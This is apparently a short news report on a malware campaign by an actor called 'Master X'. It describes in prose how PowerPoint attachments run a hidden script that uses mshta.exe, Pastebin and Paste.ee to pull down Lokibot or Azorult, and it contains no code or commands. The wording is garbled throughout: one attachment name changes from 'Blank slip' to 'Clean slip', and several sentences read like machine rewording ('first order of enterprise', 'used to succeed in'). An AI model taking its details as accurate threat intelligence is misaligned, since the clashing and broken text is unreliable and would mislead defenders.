A hacker with the handle “Master X” was found spreading his malware via PowerPoint scripts that contain a reference to Drake lyric’s “Kiki Do You Love Me.”
Master X ran an email-based campaign with a PowerPoint attachment that finally delivers malicious payloads, either Lokibot (the info stealer) or Azorult.
Researchers have further shared a pattern of the malicious emails dated January 6, 2020, indicating a Business Email Compromise scam attempt with a call to action in the subject line: “TT Remittance Recommendation”.
Two PowerPoint attachments contain the file names “INVOO13433361.pss” and “Blank slip.pss”.
A security analyst wrote in its blog that “Upon opening either of the PowerPoint attachments, it routinely runs a heavily obscured visual basic script.”
Clicking on either of the information (“INVOO13433361.pss” and “Clean slip.pss”.) triggers a Visual Basic script.
The script makes use of Window’s native Microsoft HTML utility host referred to as “mshta.exe,” a Microsoft HTML executable that sends a request to Bitly link shortener.
It helps in circumventing browser defense controls to skirt detection.
In its first order of enterprise, it makes use of a command-line task to kill Excel and Word apps.
Next, mshta.exe is used to succeed in plain-text sharing site Pastebin.com to retrieve an encoded script.
At last, the PowerShell script communicates with Paste. ee, another plain textual content-sharing site, and downloads the code for a malicious executable named Calc.exe.